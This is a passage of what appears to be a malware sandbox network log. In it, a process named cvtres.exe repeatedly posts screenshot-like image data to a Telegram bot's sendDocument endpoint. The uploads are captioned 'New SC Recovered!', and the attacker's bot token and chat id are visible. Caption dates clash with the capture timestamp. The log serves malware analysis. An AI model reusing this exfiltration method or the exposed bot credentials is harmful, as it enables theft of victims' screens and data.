                                                        2024-10-30 15:25:52 UTC16355OUTData Raw: 11 04 05 21 31 06 12 41 51 07 61 71 13 22 32 81 08 14 42 91 a1 b1 c1 09 23 33 52 f0 15 62 72 d1 0a 16 24 34 e1 25 f1 17 18 19 1a 26 27 28 29 2a 35 36 37 38 39 3a 43 44 45 46 47 48 49 4a 53 54 55 56 57 58 59 5a 63 64 65 66 67 68 69 6a 73 74 75 76 77 78 79 7a 82 83 84 85 86 87 88 89 8a 92 93 94 95 96 97 98 99 9a a2 a3 a4 a5 a6 a7 a8 a9 aa b2 b3 b4 b5 b6 b7 b8 b9 ba c2 c3 c4 c5 c6 c7 c8 c9 ca d2 d3 d4 d5 d6 d7 d8 d9 da e2 e3 e4 e5 e6 e7 e8 e9 ea f2 f3 f4 f5 f6 f7 f8 f9 fa ff da 00 0c 03 01 00 02 11 03 11 00 3f 00 8e 8a 28 af a7 3e 38 28 a9 e2 b4 9a 44 12 60 2c 67 a3 31 c0 3f d4 d4 cb 6b 0a fd e6 69 0f b7 03 ff 00 af fa 56 52 ab 08 ee cd 61 46 72 d9 14 68 ad 55 b5 b6 91 39 8b 6f ba b1 cf eb 9a 86 4d 34 f5 86 55 6f 66 f9 4f f8 52 8d 78 3f 22 a5 87 9c 7c ca 14
                                                        Data Ascii: !1AQaq"2B#3Rbr$4%&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz?(>8(D`,g1?kiVRaFrhU9oM4UofORx?"|
                                                        2024-10-30 15:25:52 UTC16355OUTData Raw: 31 8a 95 2e 66 b5 4c cb a2 8a 2b d7 3c 10 a4 a5 a2 80 2e 68 df f2 18 b4 ff 00 ae 82 bd 02 bc ff 00 47 ff 00 90 bd a7 fd 75 5f e7 5d 46 af 7f 73 f6 a8 b4 cd 3f 02 ee 61 b9 a4 3d 22 4f 5a f2 71 b1 73 ac 92 ed fe 67 bb 97 4d 42 83 6f bf e8 8d 8a ab 7a db 04 2e 55 99 56 4e 76 a9 6f e1 61 d0 7d 6b 24 f8 6f 4d 00 35 fc f2 5c 4c dd 64 96 52 32 7d a9 92 cb 67 e1 82 c0 5c 5c cf e6 0c a5 b1 6d c1 40 ea 7d ab 97 d9 46 5a 41 dd fa 1d fe d6 51 d6 6a cb d4 cb d6 ec e1 8d fe d1 6e ae 88 c7 95 68 d9 40 3e d9 15 93 5d 6f 89 66 8e e3 42 86 68 9b 72 49 22 b2 9f 62 0d 72 55 ea 60 a5 29 53 b4 ba 3b 1e 1e 63 08 c6 b5 e3 d5 5c 29 05 2d 15 d8 70 09 45 2d 25 00 14 51 45 00 14 94 b4 50 01 49 4b 45 03 12 8a 28 a0 02 8a 28 a0 02 8a 28 a0 04 a2 96 92 98 05 14 51 40 05 25 2d 25 03 0a
                                                        Data Ascii: 1.fL+<.hGu_]Fs?a="OZqsgMBoz.UVNvoa}k$oM5\LdR2}g\\m@}FZAQjnh@>]ofBhrI"brU`)S;c\)-pE-%QEPIKE(((Q@%-%
                                                        2024-10-30 15:25:52 UTC16355OUTData Raw: 61 54 b1 fd 05 15 0c ac b1 cd 14 92 12 b1 e1 d1 d8 2e ed a1 d0 ae 71 df 19 cd 3a ae 51 83 71 dc 54 23 19 54 8c 67 b1 25 a3 7d b1 ad d6 26 8c 19 dd e3 5d cc 47 2a bb 8e 78 f4 a7 5b 86 b8 f3 42 6d 53 0c 6f 23 ef 38 da 17 af e3 59 11 49 15 98 b3 b7 59 d6 75 41 72 f2 4b 1a 3e d0 cf 16 c5 51 90 0f 6e 78 ef 4b 1e a4 37 43 23 09 11 e7 8a 57 bc 25 49 1e 67 94 c8 a0 63 d4 92 c7 fd ef 6a f3 a5 8a aa af 65 d3 43 d8 8e 02 83 e5 bc bd 75 34 e5 6f 26 3b 79 1c ae db 88 56 64 da 73 90 46 71 f5 e4 7e 75 25 c2 2d ac d7 11 dd 5c db c1 f6 7f 2f 7b 33 31 19 70 4a 8f 95 4f a1 ac 74 d4 51 63 4f 96 47 36 d6 d0 bd b6 14 e3 cf 58 c2 32 9c f6 c8 53 e9 f2 7b d3 e2 bc 0f 0c e8 97 56 f0 ce d1 59 8d d7 76 c6 55 26 34 21 f8 d8 dc 82 47 38 fa 1a 1e 2a af 44 54 70 18 7b b6 df e2 6a 0d 8a
                                                        Data Ascii: aT.q:QqT#Tg%}&]G*x[BmSo#8YIYuArK>QnxK7C#W%IgcjeCu4o&;yVdsFq~u%-\/{31pJOtQcOG6X2S{VYvU&4!G8*DTp{j
                                                        2024-10-30 15:25:52 UTC15447OUTData Raw: 14 00 51 45 14 0c 29 28 a2 80 0a 4a 5a 4a 06 14 51 45 00 14 94 b4 94 0c 28 a2 8a 60 14 94 b4 94 00 51 45 14 0c 29 29 68 a4 02 51 45 14 c6 14 51 45 00 25 14 51 40 05 14 51 40 09 45 2e 29 28 18 51 45 14 00 94 52 d2 50 01 45 14 50 30 a2 8a 28 00 a2 92 8a 00 53 49 45 14 0c 28 a3 34 94 00 b4 9c 51 45 31 86 4a f4 24 7d 0d 48 b3 cc bd 24 6f ce a2 a3 34 5a e0 59 17 b3 8e a5 4f d4 54 82 ff 00 fb f0 21 aa 24 d1 9a 39 10 58 d1 5b bb 63 f7 a2 71 f4 35 22 cb 66 df f2 d9 97 fd e5 ac 9d e0 53 4c 9e 82 93 a6 bb 87 25 cd d5 8e 27 ff 00 57 73 19 fc 6a c4 36 ed 10 91 8b 29 1e 59 e4 1a e5 d9 cd 20 96 45 ce 1d 87 d0 d6 72 a6 de 97 0f 64 df 51 1b a9 e9 4d fa d2 e7 34 95 a9 ba 42 50 68 fc 69 28 28 4a 3f 2a 3a 51 40 c3 f1 a4 e9 4b 49 f4 a4 01 f5 a3 34 52 50 30 fc a9 28 a2 81 87
                                                        Data Ascii: QE)(JZJQE(`QE))hQEQE%Q@Q@E.)(QERPEP0(SIE(4QE1J$}H$o4ZYOT!$9X[cq5"fSL%'Wsj6)Y ErdQM4BPhi((J?*:Q@KI4RP0(
                                                        2024-10-30 15:25:52 UTC10874OUTData Raw: 5e b6 17 f8 31 fe ba 9f 37 98 7f bc cb e5 f9 21 28 a5 a4 ae 93 88 5a a0 97 3f 63 d7 a2 b9 cf 11 48 8c 7e 9c 67 f4 ab f5 4a e6 cb cd 95 a5 f3 31 9e d8 a8 95 ac ee 75 61 26 a1 52 ec ea 2f 75 5b 1b 5d 7f 4d 8e de e6 17 b6 2f 2b cc ca e0 ae 64 27 a9 e9 c5 60 78 b2 e2 de 4d 42 0b 6b 39 16 4b 6b 58 16 24 64 60 c0 fe 23 f0 fc ab 5f fe 10 2f fa 89 ff 00 e4 0f fe ca 94 78 08 64 67 53 24 77 c4 1f fd 95 70 42 a5 08 34 f9 b6 3d f9 46 ac 95 ac 6f 5e 9b d1 74 fe 4a ea 45 38 c7 93 f6 6d 9d 3b 6f f9 bf 3a 93 4e 37 66 76 f3 d6 fc 2e de 3e d1 e4 6d ce 47 fc f3 e7 3f a5 68 d1 5e 7f 3e 96 b1 d7 cb ad cf 36 5f ba 3e 94 b4 8b f7 47 d2 96 bd f8 7c 28 f8 ea 9f 1b f5 0a 28 a2 ac 80 ae 93 c1 7f f2 0d ba ff 00 af a7 fe 4b 5c dd 74 9e 0b ff 00 90 6d d7 fd 7d 3f f2 5a f2 f3 1f b1 f3
                                                        Data Ascii: ^17!(Z?cH~gJ1ua&R/u[]M/+d'`xMBk9KkX$d`#_/xdgS$wpB4=Fo^tJE8m;o:N7fv.>mG?h^>6_>G|((K\tm}?Z
                                                        2024-10-30 15:25:52 UTC50OUTData Raw: 0d 0a 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 64 33 63 30 63 65 31 36 34 36 62 37 62 2d 2d 0d 0a
                                                        Data Ascii: -----------------------------8dd3c0ce1646b7b--
                                                        2024-10-30 15:25:52 UTC402INHTTP/1.1 400 Bad Request
                                                        Server: nginx/1.18.0
                                                        Date: Wed, 30 Oct 2024 15:25:52 GMT
                                                        Content-Type: application/json
                                                        Content-Length: 56
                                                        Connection: close
                                                        Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                        Access-Control-Allow-Origin: *
                                                        Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                        {"ok":false,"error_code":400,"description":"Logged out"}


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        13192.168.2.450018149.154.167.2204431344C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
                                                        TimestampBytes transferredDirectionData
                                                        2024-10-30 15:25:55 UTC262OUTPOST /bot7141101422:AAHWm4uo7ZyvbT3-ERU62IF6HA54iYXM-NI/sendDocument HTTP/1.1
                                                        Content-Type: multipart/form-data; boundary=---------------------------8dd3edf620398cb
                                                        Host: api.telegram.org
                                                        Content-Length: 76460
                                                        Expect: 100-continue
                                                        Connection: Keep-Alive
                                                        2024-10-30 15:25:55 UTC25INHTTP/1.1 100 Continue
                                                        2024-10-30 15:25:55 UTC1024OUTData Raw: 0d 0a 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 64 33 65 64 66 36 32 30 33 39 38 63 62 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 63 68 61 74 5f 69 64 22 0d 0a 0d 0a 37 31 30 32 39 30 30 35 31 38 0d 0a 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 64 33 65 64 66 36 32 30 33 39 38 63 62 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 63 61 70 74 69 6f 6e 22 0d 0a 0d 0a 4e 65 77 20 53 43 20 52 65 63 6f 76 65 72 65 64 21 0a 0a 54 69 6d 65 3a 20 30 31 2f 32 37 2f 32 30 32 35 20 31 34 3a 32 32 3a 30 37 0a 55 73 65 72
                                                        Data Ascii: -----------------------------8dd3edf620398cbContent-Disposition: form-data; name="chat_id"7102900518-----------------------------8dd3edf620398cbContent-Disposition: form-data; name="caption"New SC Recovered!Time: 01/27/2025 14:22:07User
                                                        2024-10-30 15:25:55 UTC16355OUTData Raw: 11 04 05 21 31 06 12 41 51 07 61 71 13 22 32 81 08 14 42 91 a1 b1 c1 09 23 33 52 f0 15 62 72 d1 0a 16 24 34 e1 25 f1 17 18 19 1a 26 27 28 29 2a 35 36 37 38 39 3a 43 44 45 46 47 48 49 4a 53 54 55 56 57 58 59 5a 63 64 65 66 67 68 69 6a 73 74 75 76 77 78 79 7a 82 83 84 85 86 87 88 89 8a 92 93 94 95 96 97 98 99 9a a2 a3 a4 a5 a6 a7 a8 a9 aa b2 b3 b4 b5 b6 b7 b8 b9 ba c2 c3 c4 c5 c6 c7 c8 c9 ca d2 d3 d4 d5 d6 d7 d8 d9 da e2 e3 e4 e5 e6 e7 e8 e9 ea f2 f3 f4 f5 f6 f7 f8 f9 fa ff da 00 0c 03 01 00 02 11 03 11 00 3f 00 8e 8a 28 af a7 3e 38 28 a9 e2 b4 9a 44 12 60 2c 67 a3 31 c0 3f d4 d4 cb 6b 0a fd e6 69 0f b7 03 ff 00 af fa 56 52 ab 08 ee cd 61 46 72 d9 14 68 ad 55 b5 b6 91 39 8b 6f ba b1 cf eb 9a 86 4d 34 f5 86 55 6f 66 f9 4f f8 52 8d 78 3f 22 a5 87 9c 7c ca 14
                                                        Data Ascii: !1AQaq"2B#3Rbr$4%&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz?(>8(D`,g1?kiVRaFrhU9oM4UofORx?"|
                                                        2024-10-30 15:25:55 UTC16355OUTData Raw: 31 8a 95 2e 66 b5 4c cb a2 8a 2b d7 3c 10 a4 a5 a2 80 2e 68 df f2 18 b4 ff 00 ae 82 bd 02 bc ff 00 47 ff 00 90 bd a7 fd 75 5f e7 5d 46 af 7f 73 f6 a8 b4 cd 3f 02 ee 61 b9 a4 3d 22 4f 5a f2 71 b1 73 ac 92 ed fe 67 bb 97 4d 42 83 6f bf e8 8d 8a ab 7a db 04 2e 55 99 56 4e 76 a9 6f e1 61 d0 7d 6b 24 f8 6f 4d 00 35 fc f2 5c 4c dd 64 96 52 32 7d a9 92 cb 67 e1 82 c0 5c 5c cf e6 0c a5 b1 6d c1 40 ea 7d ab 97 d9 46 5a 41 dd fa 1d fe d6 51 d6 6a cb d4 cb d6 ec e1 8d fe d1 6e ae 88 c7 95 68 d9 40 3e d9 15 93 5d 6f 89 66 8e e3 42 86 68 9b 72 49 22 b2 9f 62 0d 72 55 ea 60 a5 29 53 b4 ba 3b 1e 1e 63 08 c6 b5 e3 d5 5c 29 05 2d 15 d8 70 09 45 2d 25 00 14 51 45 00 14 94 b4 50 01 49 4b 45 03 12 8a 28 a0 02 8a 28 a0 02 8a 28 a0 04 a2 96 92 98 05 14 51 40 05 25 2d 25 03 0a
                                                        Data Ascii: 1.fL+<.hGu_]Fs?a="OZqsgMBoz.UVNvoa}k$oM5\LdR2}g\\m@}FZAQjnh@>]ofBhrI"brU`)S;c\)-pE-%QEPIKE(((Q@%-%
                                                        2024-10-30 15:25:55 UTC16355OUTData Raw: 61 54 b1 fd 05 15 0c ac b1 cd 14 92 12 b1 e1 d1 d8 2e ed a1 d0 ae 71 df 19 cd 3a ae 51 83 71 dc 54 23 19 54 8c 67 b1 25 a3 7d b1 ad d6 26 8c 19 dd e3 5d cc 47 2a bb 8e 78 f4 a7 5b 86 b8 f3 42 6d 53 0c 6f 23 ef 38 da 17 af e3 59 11 49 15 98 b3 b7 59 d6 75 41 72 f2 4b 1a 3e d0 cf 16 c5 51 90 0f 6e 78 ef 4b 1e a4 37 43 23 09 11 e7 8a 57 bc 25 49 1e 67 94 c8 a0 63 d4 92 c7 fd ef 6a f3 a5 8a aa af 65 d3 43 d8 8e 02 83 e5 bc bd 75 34 e5 6f 26 3b 79 1c ae db 88 56 64 da 73 90 46 71 f5 e4 7e 75 25 c2 2d ac d7 11 dd 5c db c1 f6 7f 2f 7b 33 31 19 70 4a 8f 95 4f a1 ac 74 d4 51 63 4f 96 47 36 d6 d0 bd b6 14 e3 cf 58 c2 32 9c f6 c8 53 e9 f2 7b d3 e2 bc 0f 0c e8 97 56 f0 ce d1 59 8d d7 76 c6 55 26 34 21 f8 d8 dc 82 47 38 fa 1a 1e 2a af 44 54 70 18 7b b6 df e2 6a 0d 8a
                                                        Data Ascii: aT.q:QqT#Tg%}&]G*x[BmSo#8YIYuArK>QnxK7C#W%IgcjeCu4o&;yVdsFq~u%-\/{31pJOtQcOG6X2S{VYvU&4!G8*DTp{j
                                                        2024-10-30 15:25:55 UTC15447OUTData Raw: 14 00 51 45 14 0c 29 28 a2 80 0a 4a 5a 4a 06 14 51 45 00 14 94 b4 94 0c 28 a2 8a 60 14 94 b4 94 00 51 45 14 0c 29 29 68 a4 02 51 45 14 c6 14 51 45 00 25 14 51 40 05 14 51 40 09 45 2e 29 28 18 51 45 14 00 94 52 d2 50 01 45 14 50 30 a2 8a 28 00 a2 92 8a 00 53 49 45 14 0c 28 a3 34 94 00 b4 9c 51 45 31 86 4a f4 24 7d 0d 48 b3 cc bd 24 6f ce a2 a3 34 5a e0 59 17 b3 8e a5 4f d4 54 82 ff 00 fb f0 21 aa 24 d1 9a 39 10 58 d1 5b bb 63 f7 a2 71 f4 35 22 cb 66 df f2 d9 97 fd e5 ac 9d e0 53 4c 9e 82 93 a6 bb 87 25 cd d5 8e 27 ff 00 57 73 19 fc 6a c4 36 ed 10 91 8b 29 1e 59 e4 1a e5 d9 cd 20 96 45 ce 1d 87 d0 d6 72 a6 de 97 0f 64 df 51 1b a9 e9 4d fa d2 e7 34 95 a9 ba 42 50 68 fc 69 28 28 4a 3f 2a 3a 51 40 c3 f1 a4 e9 4b 49 f4 a4 01 f5 a3 34 52 50 30 fc a9 28 a2 81 87
                                                        Data Ascii: QE)(JZJQE(`QE))hQEQE%Q@Q@E.)(QERPEP0(SIE(4QE1J$}H$o4ZYOT!$9X[cq5"fSL%'Wsj6)Y ErdQM4BPhi((J?*:Q@KI4RP0(
                                                        2024-10-30 15:25:55 UTC10874OUTData Raw: 5e b6 17 f8 31 fe ba 9f 37 98 7f bc cb e5 f9 21 28 a5 a4 ae 93 88 5a a0 97 3f 63 d7 a2 b9 cf 11 48 8c 7e 9c 67 f4 ab f5 4a e6 cb cd 95 a5 f3 31 9e d8 a8 95 ac ee 75 61 26 a1 52 ec ea 2f 75 5b 1b 5d 7f 4d 8e de e6 17 b6 2f 2b cc ca e0 ae 64 27 a9 e9 c5 60 78 b2 e2 de 4d 42 0b 6b 39 16 4b 6b 58 16 24 64 60 c0 fe 23 f0 fc ab 5f fe 10 2f fa 89 ff 00 e4 0f fe ca 94 78 08 64 67 53 24 77 c4 1f fd 95 70 42 a5 08 34 f9 b6 3d f9 46 ac 95 ac 6f 5e 9b d1 74 fe 4a ea 45 38 c7 93 f6 6d 9d 3b 6f f9 bf 3a 93 4e 37 66 76 f3 d6 fc 2e de 3e d1 e4 6d ce 47 fc f3 e7 3f a5 68 d1 5e 7f 3e 96 b1 d7 cb ad cf 36 5f ba 3e 94 b4 8b f7 47 d2 96 bd f8 7c 28 f8 ea 9f 1b f5 0a 28 a2 ac 80 ae 93 c1 7f f2 0d ba ff 00 af a7 fe 4b 5c dd 74 9e 0b ff 00 90 6d d7 fd 7d 3f f2 5a f2 f3 1f b1 f3
                                                        Data Ascii: ^17!(Z?cH~gJ1ua&R/u[]M/+d'`xMBk9KkX$d`#_/xdgS$wpB4=Fo^tJE8m;o:N7fv.>mG?h^>6_>G|((K\tm}?Z
                                                        2024-10-30 15:25:55 UTC50OUTData Raw: 0d 0a 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 64 33 65 64 66 36 32 30 33 39 38 63 62 2d 2d 0d 0a
                                                        Data Ascii: -----------------------------8dd3edf620398cb--
                                                        2024-10-30 15:25:56 UTC402INHTTP/1.1 400 Bad Request
                                                        Server: nginx/1.18.0
                                                        Date: Wed, 30 Oct 2024 15:25:55 GMT
                                                        Content-Type: application/json
                                                        Content-Length: 56
                                                        Connection: close
                                                        Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                        Access-Control-Allow-Origin: *
                                                        Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                        {"ok":false,"error_code":400,"description":"Logged out"}


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        14192.168.2.450019149.154.167.2204431344C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
                                                        TimestampBytes transferredDirectionData
                                                        2024-10-30 15:26:03 UTC262OUTPOST /bot7141101422:AAHWm4uo7ZyvbT3-ERU62IF6HA54iYXM-NI/sendDocument HTTP/1.1
                                                        Content-Type: multipart/form-data; boundary=---------------------------8dd436c6ca63fd7
                                                        Host: api.telegram.org
                                                        Content-Length: 76478
                                                        Expect: 100-continue
                                                        Connection: Keep-Alive
                                                        2024-10-30 15:26:03 UTC25INHTTP/1.1 100 Continue
                                                        2024-10-30 15:26:03 UTC1024OUTData Raw: 0d 0a 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 64 34 33 36 63 36 63 61 36 33 66 64 37 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 63 68 61 74 5f 69 64 22 0d 0a 0d 0a 37 31 30 32 39 30 30 35 31 38 0d 0a 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 64 34 33 36 63 36 63 61 36 33 66 64 37 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 63 61 70 74 69 6f 6e 22 0d 0a 0d 0a 4e 65 77 20 53 43 20 52 65 63 6f 76 65 72 65 64 21 0a 0a 54 69 6d 65 3a 20 30 32 2f 30 32 2f 32 30 32 35 20 30 39 3a 32 31 3a 34 39 0a 55 73 65 72
                                                        Data Ascii: -----------------------------8dd436c6ca63fd7Content-Disposition: form-data; name="chat_id"7102900518-----------------------------8dd436c6ca63fd7Content-Disposition: form-data; name="caption"New SC Recovered!Time: 02/02/2025 09:21:49User
                                                        2024-10-30 15:26:03 UTC16355OUTData Raw: 11 04 05 21 31 06 12 41 51 07 61 71 13 22 32 81 08 14 42 91 a1 b1 c1 09 23 33 52 f0 15 62 72 d1 0a 16 24 34 e1 25 f1 17 18 19 1a 26 27 28 29 2a 35 36 37 38 39 3a 43 44 45 46 47 48 49 4a 53 54 55 56 57 58 59 5a 63 64 65 66 67 68 69 6a 73 74 75 76 77 78 79 7a 82 83 84 85 86 87 88 89 8a 92 93 94 95 96 97 98 99 9a a2 a3 a4 a5 a6 a7 a8 a9 aa b2 b3 b4 b5 b6 b7 b8 b9 ba c2 c3 c4 c5 c6 c7 c8 c9 ca d2 d3 d4 d5 d6 d7 d8 d9 da e2 e3 e4 e5 e6 e7 e8 e9 ea f2 f3 f4 f5 f6 f7 f8 f9 fa ff da 00 0c 03 01 00 02 11 03 11 00 3f 00 8e 8a 28 af a7 3e 38 28 a9 e2 b4 9a 44 12 60 2c 67 a3 31 c0 3f d4 d4 cb 6b 0a fd e6 69 0f b7 03 ff 00 af fa 56 52 ab 08 ee cd 61 46 72 d9 14 68 ad 55 b5 b6 91 39 8b 6f ba b1 cf eb 9a 86 4d 34 f5 86 55 6f 66 f9 4f f8 52 8d 78 3f 22 a5 87 9c 7c ca 14
                                                        Data Ascii: !1AQaq"2B#3Rbr$4%&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz?(>8(D`,g1?kiVRaFrhU9oM4UofORx?"|
                                                        2024-10-30 15:26:03 UTC16355OUTData Raw: 31 8a 95 2e 66 b5 4c cb a2 8a 2b d7 3c 10 a4 a5 a2 80 2e 68 df f2 18 b4 ff 00 ae 82 bd 02 bc ff 00 47 ff 00 90 bd a7 fd 75 5f e7 5d 46 af 7f 73 f6 a8 b4 cd 3f 02 ee 61 b9 a4 3d 22 4f 5a f2 71 b1 73 ac 92 ed fe 67 bb 97 4d 42 83 6f bf e8 8d 8a ab 7a db 04 2e 55 99 56 4e 76 a9 6f e1 61 d0 7d 6b 24 f8 6f 4d 00 35 fc f2 5c 4c dd 64 96 52 32 7d a9 92 cb 67 e1 82 c0 5c 5c cf e6 0c a5 b1 6d c1 40 ea 7d ab 97 d9 46 5a 41 dd fa 1d fe d6 51 d6 6a cb d4 cb d6 ec e1 8d fe d1 6e ae 88 c7 95 68 d9 40 3e d9 15 93 5d 6f 89 66 8e e3 42 86 68 9b 72 49 22 b2 9f 62 0d 72 55 ea 60 a5 29 53 b4 ba 3b 1e 1e 63 08 c6 b5 e3 d5 5c 29 05 2d 15 d8 70 09 45 2d 25 00 14 51 45 00 14 94 b4 50 01 49 4b 45 03 12 8a 28 a0 02 8a 28 a0 02 8a 28 a0 04 a2 96 92 98 05 14 51 40 05 25 2d 25 03 0a
                                                        Data Ascii: 1.fL+<.hGu_]Fs?a="OZqsgMBoz.UVNvoa}k$oM5\LdR2}g\\m@}FZAQjnh@>]ofBhrI"brU`)S;c\)-pE-%QEPIKE(((Q@%-%
                                                        2024-10-30 15:26:03 UTC16355OUTData Raw: 61 54 b1 fd 05 15 0c ac b1 cd 14 92 12 b1 e1 d1 d8 2e ed a1 d0 ae 71 df 19 cd 3a ae 51 83 71 dc 54 23 19 54 8c 67 b1 25 a3 7d b1 ad d6 26 8c 19 dd e3 5d cc 47 2a bb 8e 78 f4 a7 5b 86 b8 f3 42 6d 53 0c 6f 23 ef 38 da 17 af e3 59 11 49 15 98 b3 b7 59 d6 75 41 72 f2 4b 1a 3e d0 cf 16 c5 51 90 0f 6e 78 ef 4b 1e a4 37 43 23 09 11 e7 8a 57 bc 25 49 1e 67 94 c8 a0 63 d4 92 c7 fd ef 6a f3 a5 8a aa af 65 d3 43 d8 8e 02 83 e5 bc bd 75 34 e5 6f 26 3b 79 1c ae db 88 56 64 da 73 90 46 71 f5 e4 7e 75 25 c2 2d ac d7 11 dd 5c db c1 f6 7f 2f 7b 33 31 19 70 4a 8f 95 4f a1 ac 74 d4 51 63 4f 96 47 36 d6 d0 bd b6 14 e3 cf 58 c2 32 9c f6 c8 53 e9 f2 7b d3 e2 bc 0f 0c e8 97 56 f0 ce d1 59 8d d7 76 c6 55 26 34 21 f8 d8 dc 82 47 38 fa 1a 1e 2a af 44 54 70 18 7b b6 df e2 6a 0d 8a
                                                        Data Ascii: aT.q:QqT#Tg%}&]G*x[BmSo#8YIYuArK>QnxK7C#W%IgcjeCu4o&;yVdsFq~u%-\/{31pJOtQcOG6X2S{VYvU&4!G8*DTp{j
                                                        2024-10-30 15:26:03 UTC15447OUTData Raw: 14 00 51 45 14 0c 29 28 a2 80 0a 4a 5a 4a 06 14 51 45 00 14 94 b4 94 0c 28 a2 8a 60 14 94 b4 94 00 51 45 14 0c 29 29 68 a4 02 51 45 14 c6 14 51 45 00 25 14 51 40 05 14 51 40 09 45 2e 29 28 18 51 45 14 00 94 52 d2 50 01 45 14 50 30 a2 8a 28 00 a2 92 8a 00 53 49 45 14 0c 28 a3 34 94 00 b4 9c 51 45 31 86 4a f4 24 7d 0d 48 b3 cc bd 24 6f ce a2 a3 34 5a e0 59 17 b3 8e a5 4f d4 54 82 ff 00 fb f0 21 aa 24 d1 9a 39 10 58 d1 5b bb 63 f7 a2 71 f4 35 22 cb 66 df f2 d9 97 fd e5 ac 9d e0 53 4c 9e 82 93 a6 bb 87 25 cd d5 8e 27 ff 00 57 73 19 fc 6a c4 36 ed 10 91 8b 29 1e 59 e4 1a e5 d9 cd 20 96 45 ce 1d 87 d0 d6 72 a6 de 97 0f 64 df 51 1b a9 e9 4d fa d2 e7 34 95 a9 ba 42 50 68 fc 69 28 28 4a 3f 2a 3a 51 40 c3 f1 a4 e9 4b 49 f4 a4 01 f5 a3 34 52 50 30 fc a9 28 a2 81 87
                                                        Data Ascii: QE)(JZJQE(`QE))hQEQE%Q@Q@E.)(QERPEP0(SIE(4QE1J$}H$o4ZYOT!$9X[cq5"fSL%'Wsj6)Y ErdQM4BPhi((J?*:Q@KI4RP0(
                                                        2024-10-30 15:26:03 UTC10892OUTData Raw: 5e b6 17 f8 31 fe ba 9f 37 98 7f bc cb e5 f9 21 28 a5 a4 ae 93 88 5a a0 97 3f 63 d7 a2 b9 cf 11 48 8c 7e 9c 67 f4 ab f5 4a e6 cb cd 95 a5 f3 31 9e d8 a8 95 ac ee 75 61 26 a1 52 ec ea 2f 75 5b 1b 5d 7f 4d 8e de e6 17 b6 2f 2b cc ca e0 ae 64 27 a9 e9 c5 60 78 b2 e2 de 4d 42 0b 6b 39 16 4b 6b 58 16 24 64 60 c0 fe 23 f0 fc ab 5f fe 10 2f fa 89 ff 00 e4 0f fe ca 94 78 08 64 67 53 24 77 c4 1f fd 95 70 42 a5 08 34 f9 b6 3d f9 46 ac 95 ac 6f 5e 9b d1 74 fe 4a ea 45 38 c7 93 f6 6d 9d 3b 6f f9 bf 3a 93 4e 37 66 76 f3 d6 fc 2e de 3e d1 e4 6d ce 47 fc f3 e7 3f a5 68 d1 5e 7f 3e 96 b1 d7 cb ad cf 36 5f ba 3e 94 b4 8b f7 47 d2 96 bd f8 7c 28 f8 ea 9f 1b f5 0a 28 a2 ac 80 ae 93 c1 7f f2 0d ba ff 00 af a7 fe 4b 5c dd 74 9e 0b ff 00 90 6d d7 fd 7d 3f f2 5a f2 f3 1f b1 f3
                                                        Data Ascii: ^17!(Z?cH~gJ1ua&R/u[]M/+d'`xMBk9KkX$d`#_/xdgS$wpB4=Fo^tJE8m;o:N7fv.>mG?h^>6_>G|((K\tm}?Z
                                                        2024-10-30 15:26:03 UTC50OUTData Raw: 0d 0a 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 64 34 33 36 63 36 63 61 36 33 66 64 37 2d 2d 0d 0a
                                                        Data Ascii: -----------------------------8dd436c6ca63fd7--
                                                        2024-10-30 15:26:04 UTC402INHTTP/1.1 400 Bad Request
                                                        Server: nginx/1.18.0
                                                        Date: Wed, 30 Oct 2024 15:26:04 GMT
                                                        Content-Type: application/json
                                                        Content-Length: 56
                                                        Connection: close
                                                        Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                        Access-Control-Allow-Origin: *
                                                        Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                        {"ok":false,"error_code":400,"description":"Logged out"}


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        15192.168.2.450020149.154.167.2204431344C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
                                                        TimestampBytes transferredDirectionData
